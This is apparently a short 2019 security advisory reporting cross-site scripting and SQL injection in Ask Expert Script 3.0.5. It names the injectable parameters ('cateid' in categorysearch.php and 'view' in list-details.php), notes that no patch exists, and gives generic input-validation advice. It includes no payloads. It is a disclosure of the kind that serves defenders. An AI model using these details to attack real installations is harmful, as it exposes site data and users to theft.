Vendor: Ask Expert Script
By: Mr Winst0n
CVSS: 8.8 (HIGH)
Cross Site Scripting / SQL Injection
CWE: 79, 89
Product Name: Ask Expert Script
Affected Version From: 3.0.5
Affected Version To: 3.0.5
Patch Exists: NO
Related CWE: N/A
CPE: a:phpscriptsmall:ask_expert_script
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux, Windows 8.1
2019
Ask Expert Script 3.0.5 – Cross Site Scripting / SQL Injection
Ask Expert Script 3.0.5 is vulnerable to Cross Site Scripting and SQL Injection. An attacker can inject malicious JavaScript code through the 'cateid' parameter of the 'categorysearch.php' page, and malicious SQL code through the 'view' parameter of the 'list-details.php' page.
Mitigation:
Input validation should be used to prevent Cross Site Scripting and SQL Injection attacks. The application should also be tested for any security vulnerabilities.